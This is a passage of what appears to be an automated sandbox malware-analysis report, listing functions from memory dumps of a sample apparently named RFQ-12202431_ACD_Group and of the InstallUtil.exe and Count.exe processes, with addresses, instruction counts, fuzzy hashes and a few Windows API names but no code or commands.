Function 06D97C18 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390312155751.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d90000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ffc12583e76ff5901adf1c6cfb8a41aa77e2c4786cc929ebf762c0b5a3c139b
Instruction ID: 25e1161ef61efd230621e039e72646638dcc4304f88914996cf40a4132ac2d63
Opcode Fuzzy Hash: 0ffc12583e76ff5901adf1c6cfb8a41aa77e2c4786cc929ebf762c0b5a3c139b
Instruction Fuzzy Hash: 6B912270E55208CFEB94DFA8D594BEDBBB2FB89304F1090A9D049A7389DB705985CF60

Function 02EA2897 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390292281283.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f83e80b08eb77116c3b460a853fa7825313242d0b3f470e4be914c439050f6e4
Instruction ID: 9ec292607916dc9f31a3c3e44f2002a4c33d01ad452d320255d0a8edf9b6ec4a
Opcode Fuzzy Hash: f83e80b08eb77116c3b460a853fa7825313242d0b3f470e4be914c439050f6e4
Instruction Fuzzy Hash: 89711E70D9064D8FD749EF6BE99064E7BE2BBC9300F64C439D1089B368DB362856CB51

Function 02EA28B8 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390292281283.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94545896f74be707271ff649115bc975868fc59bbeb1d046d6aabe489b173daa
Instruction ID: eab598350003f00c8b32e8ee8589aa010c99b2a3b6e95f3f689d8971ed6838d0
Opcode Fuzzy Hash: 94545896f74be707271ff649115bc975868fc59bbeb1d046d6aabe489b173daa
Instruction Fuzzy Hash: C271FC70E9120D8FD748EF6BE59064E7BE2BBC9200F64C439D1089B368DB352896CB51

Function 06C46090 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390311635643.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f77a91ddbf5c2b1e97a724f06387801f4a95371898b88c359cf443cb63b7541d
Instruction ID: 7c5837c9972cf6eb89eb7d28f5491be6e3b659a2f9efb17bb44bd50b7485d827
Opcode Fuzzy Hash: f77a91ddbf5c2b1e97a724f06387801f4a95371898b88c359cf443cb63b7541d
Instruction Fuzzy Hash: 00415971E016199BEB58CFABC94069EFBF3BFC8300F14C07AD958AB218DA3059468F54

Function 06D9C3B0 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390312155751.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d90000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41c0c1dae947e279041b6385dcde3c387d68649edd1cce4c5c6782571a04cc09
Instruction ID: 6af5ab49a2cfc72d0cbbb1b8d3a1108386cbd00ea0cf730c1aeb07414d6a3a0a
Opcode Fuzzy Hash: 41c0c1dae947e279041b6385dcde3c387d68649edd1cce4c5c6782571a04cc09
Instruction Fuzzy Hash: DF41E2B0E55218CFEB98CF9AD9447EDBBF2BB88304F14C06AD409AB254D7745985CF60

Function 06B516E9 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390310829845.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10d68c03291619e41d7e88115d7507f2be09c6e6eccfeef568f482f3f35a4b46
Instruction ID: 2b7f01ca47e1621db84484272ef3e1b1c7705d21102cfa6e0ae926575719de23
Opcode Fuzzy Hash: 10d68c03291619e41d7e88115d7507f2be09c6e6eccfeef568f482f3f35a4b46
Instruction Fuzzy Hash: 704195B0D056188FEB68CF6AC948799FBF6BF88304F14C1EAD40DA7264DB750A858F41

Function 06D9C3A0 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390312155751.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d90000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f51a5790e5683d47f88318ad133668acf26ebc7c750bb04ba453574a4e92f72d
Instruction ID: 31eeb1cc28ecfc1ed0655830fa0de2441e81918462f1e297418d9462759f2692
Opcode Fuzzy Hash: f51a5790e5683d47f88318ad133668acf26ebc7c750bb04ba453574a4e92f72d
Instruction Fuzzy Hash: 9641F2B0E15218CBEB58CFAAD9447DDBBF2BB88304F14C06AD408AB258D7345985CF64

Function 06B516F8 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390310829845.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4418ae154bf6f1f6bb752aedf6fc1c482f645bfe06f3f641de3fbb03f54d974f
Instruction ID: 105a292dcfbca6f136bad01decf05fb40d7480c896c5d65b1526e1d6bde18c57
Opcode Fuzzy Hash: 4418ae154bf6f1f6bb752aedf6fc1c482f645bfe06f3f641de3fbb03f54d974f
Instruction Fuzzy Hash: C64184B0D056188FEB68CF6AC948799FBF6BF89304F14C1E9D40DA6264DB745A868F01

Function 06C47841 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390311635643.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc95cb4f5f00a127cb7eb093a23aec5df872a648cea327ebbed7c59c586cc816
Instruction ID: 3d54b25a72ee9345ee78da9a2b3c27cfbefa2620d5112565457c47774809533d
Opcode Fuzzy Hash: bc95cb4f5f00a127cb7eb093a23aec5df872a648cea327ebbed7c59c586cc816
Instruction Fuzzy Hash: 064170B1E056588BEB5CCF6B884069EFAF3AFC9200F14C1BAC54DAB219DB300546CF55

Function 07050006 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390312950315.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7050000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99fe11f5e754e6c355e6db138fb40c455717e43510e628d48424da00b05776d4
Instruction ID: 561a7f566871656fc5cd2690b04bbd37f91106fa6566fc824c51390d3673ed2c
Opcode Fuzzy Hash: 99fe11f5e754e6c355e6db138fb40c455717e43510e628d48424da00b05776d4
Instruction Fuzzy Hash: 59312E71D087948FE729CF67CC5438ABBB6AF86300F08C1EAD448AA256D7350986CF51

Function 07050040 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390312950315.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7050000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ce18b832063e9eed8f3a288c65b0fc34caa36bda042359efaeb23f0c8e8801
Instruction ID: 1f7336c02db30b598f37b8af054ed2753c8f2a51f1a360ffd8a1c3b60d901d70
Opcode Fuzzy Hash: e0ce18b832063e9eed8f3a288c65b0fc34caa36bda042359efaeb23f0c8e8801
Instruction Fuzzy Hash: D721AE71D046688BEB28CF6B885469EF7F6AFC9300F04C1BAD41CA6215D77019958F51

Function 06B5D390 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390310829845.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aed54c73d2e2965574e98237c995563b2e592f20e0fa091191363396d8e9e09a
Instruction ID: 2cffe9394da1433ca26934bc8ca50688c308c1ca3f83de60a76b66ba5deb5cfd
Opcode Fuzzy Hash: aed54c73d2e2965574e98237c995563b2e592f20e0fa091191363396d8e9e09a
Instruction Fuzzy Hash: 5021DCB1D056188BEB18CF5BC9406DDF7F3AFC9300F54C1BA880CA6218DB301A868F45

Analysis Process: InstallUtil.exePID: 5876, Parent PID: 4972COMMON

Executed Functions

Function 00FA1D18 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.391407026930.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fa0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65674194971331e2f6b5c58552c9b80b89d0eb9c6cdeec45bac7694e48b3c423
Instruction ID: d4adbfec037b80be2f9117a2d5f3b048bb9a54310c318dc7ceb9723c0bb627c6
Opcode Fuzzy Hash: 65674194971331e2f6b5c58552c9b80b89d0eb9c6cdeec45bac7694e48b3c423
Instruction Fuzzy Hash: 78917FB8B04544DFD744DF68E988BA977F2FF8A314F2684A4E1068B765CB709C85EB40

Function 00FA1D28 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.391407026930.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fa0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0240e930939ab5eb1903251d91a8813995dd15f4cd1442f32024ccf82b4e8b3
Instruction ID: 15bad181e4304fd610318ed28e5b01cc1b06f7edfce33c661baec357ab23b729
Opcode Fuzzy Hash: b0240e930939ab5eb1903251d91a8813995dd15f4cd1442f32024ccf82b4e8b3
Instruction Fuzzy Hash: 5F915EB8B04544DFDB44DF68E948BA973F2FB8A314F2684A4E1068B765CB709C85EB40

Function 00FA23D8 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.391407026930.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fa0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87f77f4114a8aab995f5abd3d1b41c0200c988e9585ddc5c845fc246bc1d8b6c
Instruction ID: 6f2aa24e3a3682f9d22f4802649467e93c735a14ad4c7d8283ea4ecbcb480958
Opcode Fuzzy Hash: 87f77f4114a8aab995f5abd3d1b41c0200c988e9585ddc5c845fc246bc1d8b6c
Instruction Fuzzy Hash: 4BA19B74B00A009FC758EF2DD594A5DBBF2BF89314F258169E40AAB3A1DB31EC01DB90

Function 00FA1B70 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.391407026930.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fa0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b459428f61f1ccc7f1b182aaedf23d946076c6f34ce391281f43f0a3c7a1b4e
Instruction ID: 53b0a818c911e4d0295676987f6e70ee4d79d4dcaf1dfb1d2e8722957b11c8af
Opcode Fuzzy Hash: 9b459428f61f1ccc7f1b182aaedf23d946076c6f34ce391281f43f0a3c7a1b4e
Instruction Fuzzy Hash: FE41E1757082408FD711DB28D8587AA7BF2FFC2364F1A80AAD405CBBA5EA349C41DB51

Function 00FA1AB1 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.391407026930.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fa0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b3d51ecd8760d1c34ee9acbaf84a4516655a66928124d725a77c87ab1a1cbe
Instruction ID: 6a1a08788aa0e3e6b3b5a1db3d2c4d579ce3417cc1fe896259974ed92ac0beeb
Opcode Fuzzy Hash: a4b3d51ecd8760d1c34ee9acbaf84a4516655a66928124d725a77c87ab1a1cbe
Instruction Fuzzy Hash: 6E113AB4E05648EFCB40EFA8D54539EBBF1FF86304F1580AAD0099B291E7784A85EB01

Function 00C0D809 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.391405525983.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c0d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26c2999a40234daf156986c761eb24feacb5bac6cd2a2a14d5a2f5c423323e65
Instruction ID: 82cb77ee44ec04f673771fd82f0cdcb1378b75b4550f9355ca2ec7d0c86c6a67
Opcode Fuzzy Hash: 26c2999a40234daf156986c761eb24feacb5bac6cd2a2a14d5a2f5c423323e65
Instruction Fuzzy Hash: D201F771504344DBE7205A66C8C4767FB98EF81734F28C22AED5A0B1C6D3799880CAF1

Function 00FA1AC0 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.391407026930.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fa0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28e6bbe9699481b3d38194470485104017dbc9a6af9a47595ec16dafb68f2703
Instruction ID: 45b34d001ea46f610f5a91b096d2339c8f7c81610b52fbaedce4674497b5c860
Opcode Fuzzy Hash: 28e6bbe9699481b3d38194470485104017dbc9a6af9a47595ec16dafb68f2703
Instruction Fuzzy Hash: 3E116DB4E01608EFDB40EF99D58579EBBF1FF85304F2080A9D00997250E7385A85EF01

Function 00FA0901 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.391407026930.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fa0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a291a18c04665cfb0a9bc81df414214f07248673460e5605e69e3e1d32f27ab2
Instruction ID: 9d4d19b84dcc25de6e81a82fb12e5fd88856db06a2269f0a956440ebc21fd3f5
Opcode Fuzzy Hash: a291a18c04665cfb0a9bc81df414214f07248673460e5605e69e3e1d32f27ab2
Instruction Fuzzy Hash: 5CF041122AE7C08FE307433058B82D27FB0AA0312230A08C7D4C6CF0A3C48C085E8772

Function 00C0D808 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.391405525983.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c0d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba3a963381d431f945a491db637939b17b9dbf372a23489c40707db453665b9a
Instruction ID: 257276a4ccaf406c652e81ea3f7313d37e6ee76f48370ec1291a515c5dc4315a
Opcode Fuzzy Hash: ba3a963381d431f945a491db637939b17b9dbf372a23489c40707db453665b9a
Instruction Fuzzy Hash: 10F0C271404344AEE7208A56DCC4B62FFA8EB91734F18C15AFD190B2C2C3799884CAB0

Function 00FA199F Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.391407026930.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fa0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39e828db71be929f527e76151f4236472342881c0f01e5c40af5e248ee66a12e
Instruction ID: 965e88fab1fb74d38f99129ed0fbae5fd0ea63b98821fc115294bff299b7abbc
Opcode Fuzzy Hash: 39e828db71be929f527e76151f4236472342881c0f01e5c40af5e248ee66a12e
Instruction Fuzzy Hash: 8CE05A7145AB908FD3030B64AD197953FB0AF53225F5A01D3D89ACF0F2D628080ACBA5

Function 00FA1A29 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.391407026930.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fa0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a327253f2dccaf9a73809c6bfba21b09a8a68abeea1bd4c7dae9a5730c2314f
Instruction ID: be088abe53b15b5e5b196755e4b3dff4231681730918764df6092b660feb3458
Opcode Fuzzy Hash: 2a327253f2dccaf9a73809c6bfba21b09a8a68abeea1bd4c7dae9a5730c2314f
Instruction Fuzzy Hash: A3E0426064E7D18FDB07577499782992FB56A83309B0D41CBD481CF5F3C5191819E366

Function 00FA3E34 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.391407026930.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fa0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a5332e4a7f6f17cc2dbe0ff14ea42ef3fc99ed3b6f405400e89c64c9f0cdc0f
Instruction ID: 85746d1c0d980064ef27c00ea0b0bd815ff6b7011b0d1ab12ce961c21b2df2f9
Opcode Fuzzy Hash: 9a5332e4a7f6f17cc2dbe0ff14ea42ef3fc99ed3b6f405400e89c64c9f0cdc0f
Instruction Fuzzy Hash: 52C04C36A15118ABDF015BA4EC14AED7AB2FB4D300F108124F51173261C6215D14BB10

Function 00FA19C8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.391407026930.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fa0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a391695832af037cb72faae8dfeb36252cf8125842038ba7867dbc815d324d77
Instruction ID: e2749fe6915a6f5fea1f3892eb70c75e84df00fff89e8ee88310d6a469c03f9b
Opcode Fuzzy Hash: a391695832af037cb72faae8dfeb36252cf8125842038ba7867dbc815d324d77
Instruction Fuzzy Hash: 24A01230040A08CBE1002754BE0E39C375DF5C11013444010A00D440B0CA1014004680

Function 00FA0950 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.391407026930.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fa0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f91519224a1c57c838cac93785854bbcec3a68f2a4995f0fdef7e77dbf55f63
Instruction ID: 85befb69e2372e83e46a22f53d0274b99e96d0138543f318a61306d0b0df5a11
Opcode Fuzzy Hash: 6f91519224a1c57c838cac93785854bbcec3a68f2a4995f0fdef7e77dbf55f63
Instruction Fuzzy Hash: 6390023208460CCB4544279578097DAB75CB946A267854051A50D415119A95646145D5

Analysis Process: Count.exePID: 1648, Parent PID: 1452COMMON

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	214
Total number of Limit Nodes:	12

Executed Functions

Function 066E4620 Relevance: 2.3, Strings: 1, Instructions: 1097COMMON

Download Yara Rule

Strings

4, xrefs: 066E4FF5

Memory Dump Source

Source File: 00000004.00000002.390527952922.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_66e0000_Count.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: e6d447b9da0e4d1157a548d5f40d3351454c93ac7fcf6cca29fd2e9d30bb3d86
Instruction ID: 24c1d85dc2ca7ef4986d1cda4604899dbb02205e2d408eadfdd6769596c224ac
Opcode Fuzzy Hash: e6d447b9da0e4d1157a548d5f40d3351454c93ac7fcf6cca29fd2e9d30bb3d86
Instruction Fuzzy Hash: C4B2E334A01218DFDB58DFA8C894BADB7B6FB88700F158199E505AB3A5DB71EC81CF50

Function 0588DCB0 Relevance: 1.9, Strings: 1, Instructions: 616
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 0588DDBA

Memory Dump Source

Source File: 00000004.00000002.390525234400.0000000005880000.00000040.00000800.00020000.00000000.sdmp, Offset: 05880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5880000_Count.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: dbb5cc5b48d04fd2ed4c476ee7834b760b8e8381980a9e29edb67f8d715a9650
Instruction ID: 27b334416b5588f163c12fa4648407ef6210e9107db88d8b21afc27658289ba5
Opcode Fuzzy Hash: dbb5cc5b48d04fd2ed4c476ee7834b760b8e8381980a9e29edb67f8d715a9650
Instruction Fuzzy Hash: F952E575E016298FDB64DF69C850AEDB7B2FB89300F1085EAD909A7355DB30AE81CF50

Function 066E4947 Relevance: 1.7, Strings: 1, Instructions: 495COMMON

Download Yara Rule

Strings

4, xrefs: 066E4FF5

Memory Dump Source

Source File: 00000004.00000002.390527952922.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_66e0000_Count.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: dd07538a86f88cacc93e31d845013e458a56d6f4476ca6b4973a0f59d259ac91
Instruction ID: 512bb4e19c34f568a85257b206c46752373c6fbbe914eb4cf53bdd08f169cd45
Opcode Fuzzy Hash: dd07538a86f88cacc93e31d845013e458a56d6f4476ca6b4973a0f59d259ac91
Instruction Fuzzy Hash: 4A22E734A01218CFDB64DF64C894BADB7B2FF88704F1581A9E509AB3A5DB71AD81CF50

Function 06820989 Relevance: 1.6, APIs: 1, Instructions: 65
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06820A19

Memory Dump Source

Source File: 00000004.00000002.390528155481.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6820000_Count.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 32c292afc84d3da9acb78288d84a977727760a7db2be851af66e15bf03aec876
Instruction ID: de08a9072c1869fc04922cf6a998dfb17d83492d5319871ad37574e0ff36a83f
Opcode Fuzzy Hash: 32c292afc84d3da9acb78288d84a977727760a7db2be851af66e15bf03aec876
Instruction Fuzzy Hash: 3E2103B5D0134A9FDB10CFAAD980ADEFBF5FF48314F60842AE519A7240C7759954CBA0

Function 06820990 Relevance: 1.6, APIs: 1, Instructions: 63
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06820A19

Memory Dump Source

Source File: 00000004.00000002.390528155481.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6820000_Count.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 57663febd739486e2bb612e9a01015d8a9ba2679380810f09e17b03531eea711
Instruction ID: 770fcfe9c4ee2478d7b5a79c4cdcb7a9d6bce07e9080be7fc18749bfff3a5172
Opcode Fuzzy Hash: 57663febd739486e2bb612e9a01015d8a9ba2679380810f09e17b03531eea711
Instruction Fuzzy Hash: FD2112B1D0134A9FDB10DFAAD884ADEFBF5FF48310F60842AE519A7240C775A954CBA0

Function 068237F0 Relevance: 1.6, APIs: 1, Instructions: 56nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 06823866

Memory Dump Source

Source File: 00000004.00000002.390528155481.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6820000_Count.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 212f8bca60996d8878a79ebefd631448dd337b9b1b6577490f40bfcba3efb768
Instruction ID: a5900f4daae05c9f85e228ddb4769ccd4df63cd7c9b0eeae8b1b301f6669a61c
Opcode Fuzzy Hash: 212f8bca60996d8878a79ebefd631448dd337b9b1b6577490f40bfcba3efb768
Instruction Fuzzy Hash: 0A1114B5D003498FDB10DFAAD4847EEFBF4AF48220F64882AD559A7240C7789945CFA0

Function 068237F8 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 06823866

Memory Dump Source

Source File: 00000004.00000002.390528155481.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6820000_Count.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4785af2405ce3001e728a21f6fd730041f45fec94bea310a649c57e58f4b1559
Instruction ID: fc8ee69e89298efded9671c9a2bf0b6a0b452e446e53da6bbc57d144b1ece6c0
Opcode Fuzzy Hash: 4785af2405ce3001e728a21f6fd730041f45fec94bea310a649c57e58f4b1559
Instruction Fuzzy Hash: 0611F6B1D003499FDB10DFAAD4847AEFBF4EF88324F54842AD559A7240C778A945CFA1

Function 066E7F90 Relevance: .6, Instructions: 552COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.390527952922.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_66e0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb4cc20c3dc741dd6f17ed8a3f17b02ebf0104f98fac78df3f971bc05c98cfe6
Instruction ID: 577d4fd179606890283db4c0f032cfcfd0675e89d459bf72724adf4541db6cb3
Opcode Fuzzy Hash: eb4cc20c3dc741dd6f17ed8a3f17b02ebf0104f98fac78df3f971bc05c98cfe6
Instruction Fuzzy Hash: AC222434B01205CFDB54DF69C984A6AB7F2FF89710B1580A9E506DB3A1DB31EC42CB91

Function 066E0006 Relevance: .5, Instructions: 503COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.390527952922.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_66e0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d918aca02fa92f9fc8abcad0f80d377d31201661ba97eeb11b767d31760695fe
Instruction ID: 1049102a91ec4f7ef4e92f0e90f500b3d9e75022d45b3ef00ef8ca4cab666b90
Opcode Fuzzy Hash: d918aca02fa92f9fc8abcad0f80d377d31201661ba97eeb11b767d31760695fe
Instruction Fuzzy Hash: 23225970A05218CFEB54DF68C845BDABBB2FB89300F1090EAD149AB356D7705E92CF51

Function 066E0040 Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.390527952922.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_66e0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4d5de5260875915942e0ce813e416d60886bf79a25b3acc7e7899c4ba4e9784
